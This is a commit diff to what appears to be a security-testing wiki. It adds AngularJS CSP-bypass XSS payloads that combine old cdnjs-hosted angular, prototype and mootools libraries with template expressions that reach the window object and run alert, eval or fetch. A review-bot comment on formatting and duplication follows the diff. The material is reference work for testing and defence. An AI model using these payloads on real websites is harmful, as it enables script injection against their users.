GitBook: [#3728] No subject
parent b4094867ca
commit 5b8d6de308
|
@ -187,24 +187,46 @@ Load a vulnerable version of angular and execute arbitrary JS:
|
|||
```markup
|
||||
<script src="https://cdnjs.cloudflare.com/ajax/libs/angular.js/1.4.6/angular.js"></script>
|
||||
<div ng-app> {{'a'.constructor.prototype.charAt=[].join;$eval('x=1} } };alert(1);//');}} </div>
|
||||
```
|
||||
|
||||
#### Other payloads:
|
||||
|
||||
```markup
|
||||
<script src="https://cdnjs.cloudflare.com/ajax/libs/prototype/1.7.2/prototype.js"></script>
|
||||
|
||||
<script src="https://cdnjs.cloudflare.com/ajax/libs/angular.js/1.0.8/angular.js" /></script>
|
||||
<div ng-app ng-csp>
|
||||
{{$on.curry.call().alert(1)}}
|
||||
{{[].empty.call().alert([].empty.call().document.domain)}}
|
||||
{{ x = $on.curry.call().eval("fetch('http://localhost/index.php').then(d => {})") }}
|
||||
</div>
|
||||
|
||||
"><script src="https://cdnjs.cloudflare.com/angular.min.js"></script> <div ng-app ng-csp>{{$eval.constructor('alert(1)')()}}</div>
|
||||
|
||||
|
||||
"><script src="https://cdnjs.cloudflare.com/angularjs/1.1.3/angular.min.js"> </script>
|
||||
<div ng-app ng-csp id=p ng-click=$event.view.alert(1337)>
|
||||
```
|
||||
|
||||
#### Payloads using Angular + a library with functions that return the `window` object ([check out this post](https://blog.huli.tw/2022/09/01/en/angularjs-csp-bypass-cdnjs/)):
|
||||
|
||||
{% hint style="info" %}
|
||||
The post shows that you could **load** all **libraries** from `cdn.cloudflare.com` (or any other allowed JS libraries repo), execute all added functions from each library, and check **which functions from which libraries return the `window` object**.
|
||||
{% endhint %}
|
||||
|
||||
```markup
|
||||
<script src="https://cdnjs.cloudflare.com/ajax/libs/prototype/1.7.2/prototype.js"></script>
|
||||
<script src="https://cdnjs.cloudflare.com/ajax/libs/angular.js/1.0.8/angular.js" /></script>
|
||||
<div ng-app ng-csp>
|
||||
{{$on.curry.call().alert(1)}}
|
||||
{{[].empty.call().alert([].empty.call().document.domain)}}
|
||||
{{ x = $on.curry.call().eval("fetch('http://localhost/index.php').then(d => {})") }}
|
||||
</div>
|
||||
|
||||
|
||||
<script src="https://cdnjs.cloudflare.com/ajax/libs/prototype/1.7.2/prototype.js"></script>
|
||||
<script src="https://cdnjs.cloudflare.com/ajax/libs/angular.js/1.0.1/angular.js"></script>
|
||||
<div ng-app ng-csp>
|
||||
{{$on.curry.call().alert('xss')}}
|
||||
</div>
|
||||
|
||||
|
||||
<script src="https://cdnjs.cloudflare.com/ajax/libs/mootools/1.6.0/mootools-core.min.js"></script>
|
||||
<script src="https://cdnjs.cloudflare.com/ajax/libs/angular.js/1.0.1/angular.js"></script>
|
||||
<div ng-app ng-csp>
|
||||
{{[].erase.call().alert('xss')}}
|
||||
</div>
|
||||
|
||||
|
||||
|
||||
```
|
||||
|
||||
### Third Party Endpoints + JSONP
|
||||
|
|
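Review bot: The hint under the new "Payloads using Angular + a library with functions that return the `window` object" heading names the host as `cdn.cloudflare.com`, while every script URL in this hunk loads from `cdnjs.cloudflare.com`; the hint should use the same hostname so a reader auditing a CSP allowlist looks at the right origin. As rendered here, the `prototype.js` 1.7.2 + `angular.js` 1.0.8 example also appears verbatim under both "Other payloads" and the new heading, so if both copies remain in the new file, keep it only under the new heading, where the hint explains it. In that example the second script tag is written `<script src="https://cdnjs.cloudflare.com/ajax/libs/angular.js/1.0.8/angular.js" /></script>`, a self-closing slash followed by a closing tag; drop the stray `/` so it matches the other script tags. The last code block also ends with several blank lines before its closing fence that can be trimmed, and the commit subject "No subject" says nothing about the change, so a short description of the added section would help anyone reading the history.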